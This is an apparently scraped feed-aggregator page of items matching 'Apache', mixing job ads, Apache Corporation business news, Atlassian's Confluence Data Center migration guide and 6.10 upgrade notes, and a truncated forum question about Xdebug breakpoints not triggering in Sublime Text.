Next Page: 10000

          Java Developer - ALTA IT Services, LLC - Clarksburg, WV      Cache   Translate Page   Web Page Cache   
Experience with the following technologies – J2EE, Weblogic, Java, Javascript, JQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
          Junior Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page   Web Page Cache   
Web server technologies like Node.js, J2EE, Apache, Nginx, ISS, etc.,. Education Analytics is a non-profit organization that uses data analysis to inform...
From Education Analytics - Fri, 06 Jul 2018 11:19:28 GMT - View all Madison, WI jobs
          Big Data Hadoop Online Training      Cache   Translate Page   Web Page Cache   
A Sacrostect service is provided that Big Data Hadoop instructional class gives you a chance to ace the ideas of the Hadoop system and sets you up for Cloudera's CCA175 Big information affirmation. With our online Hadoop preparing, you'll figure out how the segments of the Hadoop biological system, for example, Hadoop 2.7, Yarn, MapReduce, HDFS, Pig, Impala, HBase, Flume, Apache Spark, and so on fit in with the Big Data handling lifecycle.
          Java Developer - ALTA IT Services, LLC - Clarksburg, WV      Cache   Translate Page   Web Page Cache   
Experience with the following technologies – J2EE, Weblogic, Java, Javascript, JQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
          Apache Corporation and Kayne Anderson Acquisition Corp. Announce...      Cache   Translate Page   Web Page Cache   
  • Anchored by Apacheâs gathering, processing and transportation assets at Alpine High, Altus Midstream will be a publicly traded, pure-play, Permian Basin midstream C-corp.
          Apache Corporation and Kayne Anderson Acquisition Corp. Announce...      Cache   Translate Page   Web Page Cache   
  • Anchored by Apacheâs gathering, processing and transportation assets at Alpine High, Altus Midstream will be a publicly traded, pure-play, Permian Basin midstream C-corp.
  • Altus M...
          Kafka в издательском деле      Cache   Translate Page   Web Page Cache   
Внутреннее техническое устройство редакции газеты New Your Times

См. также другие публикации, посвященные Kafka


          Administrateur réseau et système - UPA - Longueuil, QC      Cache   Translate Page   Web Page Cache   
Serveurs web Apache, Tomcat ; Serveurs de base de données MySQL, SQL server, serveurs de courrier Exchange, Symantec ;...
From UPA - Fri, 20 Jul 2018 22:08:49 GMT - View all Longueuil, QC jobs
          Please update cakephp2 to 3 on the air.      Cache   Translate Page   Web Page Cache   
One website developed with cakephp and mysql(mariaDB). I need help to update cakephp2.5 to cakephp3.6. ・PHP 7.1. ・debian8.7. ・apache 2.4 ・I give you remote login account with root. ・Please tell me how... (Budget: $30 - $250 USD, Jobs: CakePHP, Debian, MySQL, PHP)
          Rep. Doggett Asks for Release of S.A. Dreamer Detained Near the Occupy ICE Camp      Cache   Translate Page   Web Page Cache   
U.S. Rep. Lloyd Doggett has asked Immigration and Customs Enforcement to parole the 18-year-old Dreamer it picked up last Friday near San Antonio's Occupy ICE camp.

Doggett, a Democrat representing San Antonio and Austin, submitted a formal letter Wednesday on behalf of Sergio Salazar Gonzalez, known to protesters at the camp as "Mapache."…
          PySpark Cookbook      Cache   Translate Page   Web Page Cache   

eBook Details: Paperback: 330 pages Publisher: WOW! eBook (June 29, 2018) Language: English ISBN-10: 1788835360 ISBN-13: 978-1788835367 eBook Description: PySpark Cookbook: Combine the power of Apache Spark and Python to build effective big data applications

The post PySpark Cookbook appeared first on eBookee: Free eBooks Download.


          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 01 Aug 2018 01:21:56 GMT - View all Seattle, WA jobs
          Moving to Confluence Data Center      Cache   Translate Page   Web Page Cache   

Page edited by Michelle Mortimer - "Published by Scroll Versions from space DOCM and version 6.10"

This page outlines the process for migrating an existing Confluence Server (non-clustered) site to Confluence Data Center (clustered).

If you're installing Confluence for the first time (you don't have any existing Confluence data to migrate), see Installing Confluence Data Center

If you're wanting to switch back to a non-clustered solution, see Moving from Data Center to Server.

Your Confluence license determines the type of Confluence you have: Server or Data Center. Confluence will auto-detect the license type when you enter your license key, and automatically prompt you to begin the migration.

Before you begin

Clustering requirements

To run Confluence in a cluster you must:

  • Have a Data Center license (you can purchase a Data Center license or create an evaluation license at my.atlassian.com)
  • Use a supported external database, operating system and Java version
  • Use a load balancer with session affinity and WebSockets support in front of the Confluence cluster
  • Have a shared directory accessible to all cluster nodes in the same path (this will be your shared home directory)
  • Use OAuth authentication if you have application links to other Atlassian products (such as Jira)

Supported platforms

See our Supported Platforms page for information on the database, Java, and operating systems you'll be able to use. These requirements are the same for Server and Data Center deployments. See Confluence Data Center Technical Overview for important hardware and infrastructure considerations.

We also have specific guides and deployment templates to help you running Confluence Data Center in AWS or Azure. Check them out to find out what's required.

Terminology

In this guide we'll use the following terminology:

  • Installation directory – The directory where you installed Confluence on a node.
  • Local home directory – The home or data directory on each node (in non-clustered Confluence this is simply known as the home directory).
  • Shared home directory – The directory you created that is accessible to all nodes in the cluster via the same path. 
  • Synchrony home directory - The directory where you configure and run Synchrony from (this may be on a confluence node, or on its own node)

At the end of the installation process, you'll have an installation and local home directory on each node, and a single shared home directory (a total of 5 directories in a two node cluster) for Confluence plus directories for Synchrony. 

Set up Data Center

1. Upgrade Confluence Server 

If you plan to upgrade Confluence as part of your migration to Data Center, you should upgrade your existing Confluence Server site as the first step.  

2. Apply Data Center license 

  1. Go to  > General Configuration > License Details
  2. Enter your new Confluence Data Center license key.
  3. You'll be prompted to stop Confluence to begin the migration.

 

At this stage your home directory (configured in confluence\WEB-INF\classes\confluence-init.properties) should still be pointing to your existing (local) home directory.

3. Create a shared home directory 

  1. Create a directory that's accessible to all cluster nodes via the same path. The directory should be empty. This will be your shared home directory. 
  2. In your existing Confluence home directory, move the contents of <confluence home>/shared-home to the new shared home directory you just created.

    To prevent confusion, we recommend deleting the empty <confluence home>/shared-home directory once you've moved its contents.
  3. Move your attachments directory to the new shared home directory (skip this step if you currently store attachments in the database). 

4. Start Confluence

The setup wizard will prompt you to complete the migration, by entering:

  • A name for your cluster
  • The path to the shared home directory you created earlier
  • The network interface Confluence will use to communicate between nodes
  • A multicast address (automatically generated or enter your own) or the IP addresses of each cluster node
  • How you want Confluence to discover cluster nodes:

    • Multicast - enter your own multicast address or automatically generate one.
    • TCP/IP - enter the IP address of each cluster node
    • AWS - enter your IAM Role or secret key, and region.
       

      AWS node discovery...

      We recommend using our Quick Start or Cloud Formation Template to deploy Confluence Data Center in AWS, as it will automatically provision, configure and connect everything you need.

      If you do decide to do your own custom deployment, you can provide the following information to allow Confluence to auto-discover cluster nodes:

      FieldDescription
      IAM Role or
      Secret Key
      This is your authentication method. You can choose to authenticate by IAM Role or Secret Key.
      RegionThis is the region your cluster nodes (EC2 instances) will be running in.
      Host headerOptional. This is the AWS endpoint for Confluence to use (the address where the EC2 API can be found, for example 'ec2.amazonaws.com'). Leave blank to use the default endpoint.
      Security group nameOptional. Use to narrow the members of your cluster to only resources in a particular security group (specified in the EC2 console).
      Tag key and Tag value

      Optional. Use to narrow the members of your cluster to only resources with particular tags (specified in the EC2 console).

Once you've confirmed that Confluence is running, stop Confluence so you can set up Synchrony (required if you want to continue to use collaborative editing).  

Set up Synchrony

5. Set up a Synchrony cluster

In this example, we assume you'll run Synchrony in its own cluster.
 

  1. Grab the <install-directory>/bin/synchrony directory from your first Confluence node and move it to your Synchrony node.  We'll call this your <synchrony-home> directory.
  2. Copy synchrony-standalone.jar from your Confluence local home directory to your <synchrony-home> directory. 
  3. Copy your database driver from your Confluence <install-directory>/confluence/web-inf/lib to your <synchrony-home> directory or other appropriate location on your Synchrony node.
  4. Edit the <synchrony-home>/start-synchrony.sh or start-synchrony.bat file and enter details for the parameters listed under Configure parameters.
    See Configuring Synchrony for Data Center for more information on the required parameters and some and optional properties that you can also choose to specify.
  5. Start Confluence then head to 
    http://<SERVER_IP>:<SYNCHRONY_PORT>/synchrony/heartbeat
    to check that Synchrony is available
  6. Copy your <synchrony-home> directory to each Synchrony node. As each node joins you'll see something like this in your console.

    Members [2] {
    	Member [172.22.52.12]:5701
    	Member [172.22.49.34]:5701 
    }
    
  7. Configure your load balancer for Synchrony.
    Your load balancer must support WebSockets (for example NGINX 1.3 or later, Apache httpd 2.4, IIS 8.0 or later). SSL connections must be terminated at your load balancer so that Synchrony can accept XHR requests from the web browser. 

6. Start Confluence on Node 1

In this example, we assume you use the same load balancer for Synchrony and Confluence, as shown in Configuring Synchrony for Data Center.

  1. Start Confluence on node 1 and pass the following system property to Confluence to tell Confluence where to find your Synchrony cluster.

    -Dsynchrony.service.url=http://<synchrony load balancer url>/synchrony/v1

    For example http://yoursite.example.com/synchrony/v1. You must include /v1 on the end of the URL.

    If Synchrony is set up as one node without a load balancer, use the following instead:

    -Dsynchrony.service.url=http://<synchrony ip or hostname>:<synchrony port>/synchrony/v1

    For example http://42.42.42.42:8091/synchrony/v1 or http://synchrony.example.com:8091/synchrony/v1

    You may want to add this system property to your <install-directory>/bin/setenv.sh or setenv.bat so it is automatically passed every time you start Confluence. See Configuring System Properties for more information on how to do this in your environment.

  2. Head to  > General Configuration > Collaborative editing to check that this Confluence node can connect to Synchrony. 

    Note: to test creating content you'll need to access Confluence via your load balancer.  You can't create or edit pages when accessing a node directly.

Add more Confluence nodes

7. Copy Confluence to second node

To copy Confluence to the second node:

  1. Shut down Confluence on node 1
  2. Shut down your application server on node 2, or stop it automatically loading web applications
  3. Copy the installation directory from node 1 to node 2
  4. Copy the local home directory from node 1 to node 2
    If the file path of the local home directory is not the same on nodes 1 and 2 you'll need to update the <installation directory>/confluence/WEB-INF/classes/confluence-init.properties file on node 2 to point to the correct location.

Copying the local home directory ensures the Confluence search index, the database and cluster configuration, and any other settings are copied to node 2.

8. Configure load balancer

Configure your load balancer for Confluence. You can use the load balancer of your choice, but it needs to support session affinity and WebSockets.

SSL connections must be terminated at your load balancer so that Synchrony can accept XHR requests from the web browser.

You can verify that your load balancer is sending requests correctly to your existing Confluence server by accessing Confluence through the load balancer and creating a page, then checking that this page can be viewed/edited by another machine through the load balancer.

9. Start Confluence one node at a time

You must only start Confluence one node at a time. The first node must be up and available before starting the next one.

  1. Start Confluence on node 1
  2. Wait for Confluence to become available on node 1
  3. Start Confluence on node 2
  4. Wait for Confluence to become available on node 2.

The Cluster monitoring console ( > General Configuration > Clustering) shows information about the active cluster.

When the cluster is running properly, this page displays the details of each node, including system usage and uptime. Use the menu to see more information about each node in the cluster.

10. Test your Confluence cluster

Remember, to test creating content you'll need to access Confluence via your load balancer.  You can't create or edit pages when accessing a node directly.

A simple process to ensure your cluster is working correctly is:

  1. Access a node via your load balancer, and create a new document on this node
  2. Ensure the new document is visible by accessing it directly on a different node
  3. Search for the new document on the original node, and ensure it appears
  4. Search for the new document on another node, and ensure it appears

If Confluence detects more than one instance accessing the database, but not in a working cluster, it will shut itself down in a cluster panic. This can be fixed by troubleshooting the network connectivity of the cluster.


Security

Ensure that only permitted cluster nodes are allowed to connect to a Confluence Data Center instance's Hazelcast port (which defaults to 5801) or Synchrony's Hazelcast port (which defaults to 5701) through the use of a firewall and / or network segregation.

Troubleshooting

If you have problems with the above procedure, please see our Cluster Troubleshooting guide.

If you're testing Confluence Data Center by running the cluster on a single machine, please refer to our developer instructions on Starting a Confluence cluster on a single machine.


          Apache, Kayne ink $3.5bn Permian midstream deal      Cache   Translate Page   Web Page Cache   
Pipeline company to be anchored by US independent's Alpine High assets
          Administrateur réseau et système - UPA - Longueuil, QC      Cache   Translate Page   Web Page Cache   
Serveurs web Apache, Tomcat ; Serveurs de base de données MySQL, SQL server, serveurs de courrier Exchange, Symantec ;...
From UPA - Fri, 20 Jul 2018 22:08:49 GMT - View all Longueuil, QC jobs
          Disney usará el guion de James Gunn para Guardianes de la Galaxia Vol. 3      Cache   Translate Page   Web Page Cache   
guardians-of-the-galaxy-2-james-gunn-chris-pratt-02-600x445
James Gunn ya está siendo buscado por Warner Bros. mientras Disney decide que si usará su guion para Guardianes de la Galaxia Vol. 3.
          Setup and configure Linux servers      Cache   Translate Page   Web Page Cache   
I am busy freelancer who needs an extra pair of hands. I need an experienced Linux system admin to do below tasks: - Setup Ubuntu servers - Separate an existing web apps into production and development... (Budget: $30 - $250 USD, Jobs: Amazon Web Services, Apache, Linux, System Admin, Ubuntu)
          Pickleball      Cache   Translate Page   Web Page Cache   
(South 8th and Apache streets). Loaner paddles are available if you don’t have one. Follow these topics:
          Aggregated Audit Logging With Google Cloud and Python      Cache   Translate Page   Web Page Cache   

In this post, we will be aggregating all of our logs into Google BigQuery Audit Logs. Using big data techniques we can run our audit log aggregation in the cloud.

Essentially, we are going to take some Apache2 server access logs from a production web server (this one in fact), convert the log file line-by-line to JSON data, publish that JSON data to a Google PubSub topic, transform the data using Google DataFlow, and store the resulting log file in Google BigQuery long-term storage. It sounds a lot harder than it actually is.


          Application Developer      Cache   Translate Page   Web Page Cache   
NY-NEW YORK CITY, A leading healthcare company is seeking a strong Big Data/Business Intelligence developer Qualifications 3+ years of business intelligence development experience Must have expertise in the Hadoop ecosystem Knowledge of BI tools and statisctical packages such as SAS, R or SciPy/NumPy Knowledge of Apache Hadoop, Apache Spark (including pyspark), Spark streaming, Kafka, Scala, Python, MapReduce, Yarn
          Setup and configure Linux servers      Cache   Translate Page   Web Page Cache   
I am busy freelancer who needs an extra pair of hands. I need an experienced Linux system admin to do below tasks: - Setup Ubuntu servers - Separate an existing web apps into production and development... (Budget: $30 - $250 USD, Jobs: Amazon Web Services, Apache, Linux, System Admin, Ubuntu)
          (USA-NJ-Franklin Lakes) Associate Software Packaging Engineer      Cache   Translate Page   Web Page Cache   
**POSITION SUMMARY** The associate IT engineer will service day to day operational engineering requests from product teams, project teams, and operational customers\. The associate IT engineer will also work with guidance of other team members to design, develop, and implement capabilities that advance the roadmap and vision of the Monitoring Engineering team and its partners\. Candidate will be required to administer various monitoring platforms, work within existing processes, and ensure compliance of monitoring solutions with corporate standards\. The candidate will also assist in optimizing operational practices, and assessing progress through data\-driven metrics\. **ESSENTIAL FUNCTIONS** + Coordinate and facilitate meetings with application and system teams to determine monitoring needs + Coordinate and interpret monitoring needs and ensure all requests for monitoring follow a standard workflow + Design, develop, document, and deploy monitoring requests into the various monitoring systems within the ESIenterprise + Design, develop, document, and deploy standard reporting for all monitoring platforms within the ESIenterprise + Adhere to standard change control criteria before monitors are moved intoproduction + Act as a liaison between business and technical teams and the ESI CMEA and NOCmanagement + Coordinate with other support teams to ensure all monitoring tools are configured into an organized package for use by the ESI Central Monitoring + Administer and support tooling and associated infrastructure including version and lifecycle management, patching, break\-fix support, and administrative tasks **QUALIFICATIONS** + Bachelor's Degree Required + 2 \- 5 years of relevant work experience + 1\-3 years of experience in Monitoring, System Administration, Networking, or similar technology + Conceptual understanding of monitoring capabilities at all levels including asset, utility, application, and business insight\. + Minimum 1 year experience in implementing, maintaining, and supporting enterprise class monitoring solutions in a large and heterogeneous environment + Experience evaluating, implementing, and administering Application Performance Management solutions such as CA APM \(Wily Introscope\) and Riverbed’s APM Xpert Tool Suite + Must have experience with BMC Portal/Patrol \- Experience with BMC ProactiveNet Performance Manager \(BPPM\) and TMART + Must have experience with SolarWinds Orion Network Performance Manager + Must have experience with HP Site Scope and HP LoadRunner scripting + Experience with monitoring of virtual server environments is a plus + Working knowledge of security and security concepts, firewalls and anti\-virus + Working knowledge of standard industry web servers \(Apache, IIS, etc\.\), java containers \(JBoss, MuleSoft, Websphere, Weblogic, Tomcat, etc\.\) + Working knowledge of database monitoring techniques \(DB2, Microsoft SQL Server, and Oracle\) + Working knowledge of security architectures, HTTP/HTTPS, SSL, LDAP, HTML, Web Servers: Apache, IIS + Working knowledge of application platforms \(IBM WebSphere, Mulesoft, Tomcat, and \.NET\)\. + Prior experience with cloud\-based platforms and cloud\-native application architectures is desirable + Working knowledge of networking: TCP/IP, and familiarity with firewalls, hubs, routers, switches, DNS, gateways, load balancing and basic networkanalysis/troubleshooting + Working knowledge of various scripting languages such asShell/PERL/PHP/HTML/XML/SOAP/REST/JavaScript/AutoHotKey/SeleniumWeb Driver + Working knowledge of monitoring\-related network and systems management protocols such as HTTP/HTTPS, SNMP, RDP, SSH, LDAP, WMI, IMAP/POP, ICMP, FTP, TELNET, SMTP, DNS, etc\. and how to monitor their health and efficiency + Foundational knowledge and experience with VMware/ESX, VMS and physical hardware + Familiarity with key servers/encryption, PKI/certificates, JAVA, APIs, and browsers + Exposure to architectural concepts such as SOA, ITIL, SOFEA, etc **ABOUT THE DEPARTMENT** Do you enjoy making things work seamlessly and figuring out ways to improve functionality? Do you have a knack for automating processes? Be a part of our team that focuses on reliability and keeping our systems running\. From data centers to servers, this talent is relied on to create and maintain critical platforms for the organization\. If this is your skill set and you want to be at the center of work that impacts 83 million Americans, explore our opportunities\. **ABOUT EXPRESS SCRIPTS** Advance your career with the company that makes it easier for people to choose better health\. Express Scripts is a leading healthcare company serving tens of millions of consumers\. We are looking for individuals who are passionate, creative and committed to creating systems and service solutions that promote better health outcomes\. Join the company that Fortune magazine ranked as one of the "Most Admired Companies" in the pharmacy category\. Then, use your intelligence, creativity, integrity and hard work to help us enhance our products and services\. We offer a highly competitive base salary and a comprehensive benefits program, including medical, prescription drug, dental, vision, 401\(k\) with company match, life insurance, paid time off, tuition assistance and an employee stock purchase plan\. Express Scripts is committed to hiring and retaining a diverse workforce\. We are an Equal Opportunity Employer, making decisions without regard to race, color, religion, sex, national origin, age, veteran status, disability, or any other protected class\. Applicants must be able to pass a drug test and background investigation\. Express Scripts is a VEVRAA Federal Contractor\.
          If you did not already know      Cache   Translate Page   Web Page Cache   
Apache Calcite Apache Calcite is a Dynamic Data Management Framework. It Contains Many of the Pieces That Comprise a Typical …

Continue reading


          NN Investment Partners Holdings N.V. Lowers Position in Apache Co. (APA)      Cache   Translate Page   Web Page Cache   
NN Investment Partners Holdings N.V. reduced its holdings in Apache Co. (NYSE:APA) by 36.0% in the second quarter, according to the company in its most recent Form 13F filing with the SEC. The institutional investor owned 121,612 shares of the energy company’s stock after selling 68,470 shares during the quarter. NN Investment Partners Holdings N.V.’s […]
          Technical Webmaster - UNESCO Institute for Statistics - Montréal, QC      Cache   Translate Page   Web Page Cache   
Act as primary resource to oversee and maintain the UIS online presence including the UIS website and microsites (Drupal, Apache, ISS, SOLR) intranet... $3,418 a month
From UNESCO Institute for Statistics - Wed, 25 Jul 2018 00:18:23 GMT - View all Montréal, QC jobs
          Apache to Form Midstream Business in Deal With 'Blank-Check...      Cache   Translate Page   Web Page Cache   
 By Josh Beckerman 

Apache Corp. (APA) is forming Permian Basin midstream energy business Altus Midstream Co. via a deal with a blank-check company, contributing nearly all of its gathering, processing and transportation assets at the Alpine High formation in West Texas.

Kayne...

          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 01 Aug 2018 01:21:56 GMT - View all Seattle, WA jobs
          Confluence 6.10 Upgrade Notes      Cache   Translate Page   Web Page Cache   

Page edited by Rachel Robins - "Added known issue for confluence.cfg.xml"

Here are some important notes on upgrading to Confluence 6.10. For details of the new features and improvements in this release, see the Confluence 6.10 Release Notes.

Upgrade notes

Confluence 6 is a major upgrade

If you're upgrading from Confluence 5.x, be sure to read these upgrade notes thoroughly, take a full backup, and test your upgrade in a non-production environment before upgrading your production site.

Tomcat 9 upgrade  

In this release we've upgraded Apache Tomcat from version 8 to 9. Some things you should be aware of:

  • Tomcat 9 supports HTTP/2, but Confluence does not yet support this protocol. 
  • Tomcat 9 introduces support for multiple TLS virtual hosts for a single connector with each virtual host supporting multiple certificates. We haven't tested this with Confluence yet, and have made no changes to the sample connectors in Confluence's server.xml file. We may introduce some changes in future releases. 

As usual, we recommend upgrading your test or staging site before upgrading your production site to Confluence 6.10, particularly if you've made significant changes to your server.xml.  It's also good practice to re-apply modifications, rather than just copying over your old server.xml

If you're running Confluence as a service, you may need to:

  • reinstall the service, if you've upgraded Confluence manually
  • reapply any system properties or JVM flags you may be passing via the service. 

Search improvements

In this release we fixed a number of issues relating to search. Some of the fixes will only apply to newly created or edited content, until you next reindex your site. 

Additional memory requirements for Data Center

As mentioned in the release notes, you should make sure that each Confluence node in the cluster has at least 2GB free memory to cater for the sandboxes.

Supported platforms changes

In this release we've:

  • Added support for Microsoft SQL Server 2016

Update configuration files after upgrading

The contents of configuration files such as server.xml, web.xmlsetenv.batsetenv.sh and confluenceinit.properties change from time to time. 

When upgrading, we recommend manually reapplying any additions to these files (such as proxy configuration, datasource, JVM parameters) rather than simply overwriting the file with the file from your previous installation, otherwise you will miss out on any improvements we have made.

Upgrading from Confluence 5.x?

Collaborative editing is made possible by the magic of Synchrony. When you install Confluence Server, Synchrony will be configured to run as a separate process on your server.

If you're upgrading from Confluence 5.x, there are a few requirements you need to be aware of:

Collaborative editing requirements...
  • Memory and CPU: You may need to give your server more resources than for previous Confluence releases. When you install Confluence, Synchrony (which is required for collaborative editing), will be configured to run as a separate process on your server. The default maximum heap size for Synchrony is 1 GB (on top of Confluence's requirements). 
  • WebSockets: Collaborative editing works best with WebSockets. Your firewall / proxy should allow WebSocket connections. 
  • SSL termination: SSL should be terminated at your load balancer, proxy server, or gateway as Synchrony does not support direct HTTPS connections. 
  • Database drivers: You must use a supported database driver. Collaborative editing will fail with an error if you're using an unsupported or custom JDBC driver (or driverClassName in the case of a JNDI datasource connection). See Database JDBC Drivers for the list of drivers we support.
  • Database connection pool: your database must allow enough connections to support both Confluence and Synchrony (which defaults to a maximum pool size of 15). 

Infrastructure changes 

For developers

Head to Preparing for Confluence 6.10 to find out more about changes under the hood. 

End of support announcements

No announcements. 

Known issues

Upgrade procedure

Note: Upgrade to a test environment first. Test your upgrades in your test environment before rolling them into production.

If you're already running a version of Confluence, please follow these instructions to upgrade to the latest version:

  1. Go to > Support Tools > Health Check to check your license validity, application server, database setup and more.
  2. Before you upgrade, we strongly recommend that you back up your installation directory, home directory and database.
  3. If your version of Confluence is earlier than 6.5, read the release notes and upgrade guides for all releases between your version and the latest version.
  4. Download the latest version of Confluence.
  5. Follow the instructions in the Upgrade Guide.

Checking for known issues and troubleshooting the Confluence upgrade

After you have completed the steps required to upgrade your Confluence installation, check all the items on the Confluence post-upgrade checklist to ensure that everything works as expected. If something is not working correctly, please check for known Confluence issues and try troubleshooting your upgrade as described below:

  • Check for known issues. Sometimes we find out about a problem with the latest version of Confluence after we have released the software. In such cases we publish information about the known issues in the Confluence Knowledge Base.
  • Check for answers from the community. Other users may have encountered the same issue. You can check for answers from the community at Atlassian Answers.
  • Did you encounter a problem during the Confluence upgrade? Please refer to the guide to troubleshooting upgrades in the Confluence Knowledge Base.

If you encounter a problem during the upgrade and can't solve it, please create a support ticket and one of our support engineers will help you.


          #traffic - wsphotobus      Cache   Translate Page   Web Page Cache   
VIAÇÃO GATO PRETO 8 213 - @caioinduscaroficial Apache VIP I Mercedes Benz OF-1722M #bus #buses #onibus #onibusbrasil #autobus #Omnibus #InstaBusologos #Instabus #instabuslovers #busmania #Urbano #busologia #transportepublico #buslovers #transportation #busphotography #olharesdesampa #igers #instagood #brasil #nofilter #transport #publictransport #traffic #instaphoto #instalike #saopaulo #saopaulocity #photo #mercedesbenz
          K’o tzukunik xb’an Pavón ri’      Cache   Translate Page   Web Page Cache   
  Pa le unimaxik ri cholchak rech Q’atel b’anow k’ax pa taq le japache’ ri’ eri tzukunem ya’olchajinik ri’ are xtaq ub’anik kumal ri q’atb’altzij rech ri Ministerio rech Gobernación, pa amaq’ tinamit ri’ che ri K’amal b’e rech ri Wokajil Japache’ ri’, Camilo Morales Castro, rech xuya’ utzijol che ri tzukunem ya’olchajinik ri’ are […]
          Document automation - Intranet to create custom Word document based on user specified data - Upwork      Cache   Translate Page   Web Page Cache   
Create a web page on our CMS (Ubuntu/Apache/Drupal) which will gather text data via direct input user form or from a user-specified Drupal entity and insert the data obtained into a group of Word documents and a single Excel spreadsheet.  The Word documents are pre-assembled but require only the insertion of the gathered data into the XML or via links in the document to be complete.  The excel spreadsheet will have only the key data entered by the user or taken from a data source specified by the user.  We prefer to avoid VBA if possible due to pop-up warnings.

We use Drupal 8 so if you can do this with a Drupal 8 plug in or custom code, that would be best.  

Once this works properly there will be ongoing work to maintain it as needed.

Budget: $200
Posted On: August 09, 2018 02:31 UTC
ID: 213902493
Category: Web, Mobile & Software Dev > Web Development
Skills: HTML, jQuery, PHP
Country: Turks and Caicos Islands
click to apply
          Comment on Lethal Weapon: Replacing Clayne Crawford “Wasn’t Our Choice” Says Fox Chair by Apache      Cache   Translate Page   Web Page Cache   
Sean william scott is good for another american pie i watched the show because of crawford and damon's partnership bring him back it's gonna suck with stiffler nothing he makes ever works you just messed up my show line up....bring him back
          Con Carlos Tevez afuera, Mauro Zárate aseguró el triunfo de Boca y le dio la razón al Mellizo      Cache   Translate Page   Web Page Cache   
El ex Vélez, el elegido del DT por sobre el Apache, metió el segundo gol de Boca en el triunfo ante Libertad. "A veces, la jugada del morfón me sale bien", tiró.
          Carlitos Tevez y Susana Gimenez en Fuerte Apache: Especiales 2018 Telefe 15.08.18      Cache   Translate Page   Web Page Cache   

SUSANA GIMÉNEZ Y CARLITOS TEVEZ

DESDE FUERTE APACHE

Se produce el regreso más esperado: Susana Giménez y el primero de sus especiales del año.


          PySpark Cookbook      Cache   Translate Page   Web Page Cache   

eBook Details: Paperback: 330 pages Publisher: WOW! eBook (June 29, 2018) Language: English ISBN-10: 1788835360 ISBN-13: 978-1788835367 eBook Description: PySpark Cookbook: Combine the power of Apache Spark and Python to build effective big data applications

The post PySpark Cookbook appeared first on WOW! eBook: Free eBooks Download.


          Application Developer      Cache   Translate Page   Web Page Cache   
NY-NEW YORK CITY, A leading healthcare company is seeking a strong Big Data/Business Intelligence developer Qualifications 3+ years of business intelligence development experience Must have expertise in the Hadoop ecosystem Knowledge of BI tools and statisctical packages such as SAS, R or SciPy/NumPy Knowledge of Apache Hadoop, Apache Spark (including pyspark), Spark streaming, Kafka, Scala, Python, MapReduce, Yarn
          Scala/Spark Engineer/Developer      Cache   Translate Page   Web Page Cache   
OH-Columbus, job summary: Senior Developers with significant experience using Apache Spark. This position will be located in our headquarters in Columbus, Ohio. Technologies and Tools We Use to Build Solutions: Java, JavaScript, CSS, Angular JS, Scala/Spark, Python, Redis, JBoss/Wildfly, Jetty, Spring, REST, Node, Gulp, Maven, Eclipse, IntelliJ, SQL, Linux, Gerrit/Git, Jenkins, Junit, Ruby, Cucumber, Protracto
          Fullstack Java Developer      Cache   Translate Page   Web Page Cache   
NC-CHARLOTTE, A leading Fortune 100 company is seeking a strong Java Developer Qualifications 6+ years of overall Java development experience Must have experience with the below technologies Java, J2EE JQuery, Bootstrap, JavaScript frameworks, EXT JS, Angular, React JavaScript, JSP, HTML, AJAX, CSS, HTTP SOAP, WSDL, XSD, JSON, Web services and XML Weblogic,JBOSS, Apache, Tomcat servers Must have understanding o
          Xdebug never stops at my breakpoints Sublime Text      Cache   Translate Page   Web Page Cache   

I've successfully installed Sublime Text and xdebug on my 64bit Win7 machine and installed The easiest Xdebug plugin in Firefox. Sublime Text is running as Administrator, its project file sets the correct path and xdebug settings, and I have breakpoints only on lines with valid php code. WampServer is running correctly on http://localhost:8080/ .

The xdebug package commands appear to work as designed, but the debugger never stops at my breakpoints. Starting or stopping the debugger within Sublime Text opens the correct HTML page in Firefox, although the page load is significantly slower than usual.

I've set up the xdebug log. Here's a sample.

Log opened at 2013-06-23 21:42:02 I: Connecting to configured address/port: localhost:9000. I: Connected to client. :-) -> <init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///C:/wamp/bin/php/firelogger/firelogger.php" language="PHP" protocol_version="1.0" appid="3948" idekey="sublime.xdebug"><engine version="2.2.3"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2013 by Derick Rethans]]></copyright></init> <- breakpoint_set -i 1 -n 10 -t line -f file://C:\Users\work\My Projects\ElseApps\EAFF\code\webroot\index.php -> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="breakpoint_set" transaction_id="1"><error code="1"><message><![CDATA[parse error in command]]></message></error></response> <- breakpoint_set -i 2 -n 17 -t line -f file://C:\Users\work\My Projects\ElseApps\EAFF\code\approot\core\etc\eaff-index.php -> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="breakpoint_set" transaction_id="2"><error code="1"><message><![CDATA[parse error in command]]></message></error></response> <- breakpoint_set -i 3 -n 18 -t line -f file://C:\Users\work\My Projects\ElseApps\EAFF\code\approot\core\etc\eaff-index.php -> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="breakpoint_set" transaction_id="3"><error 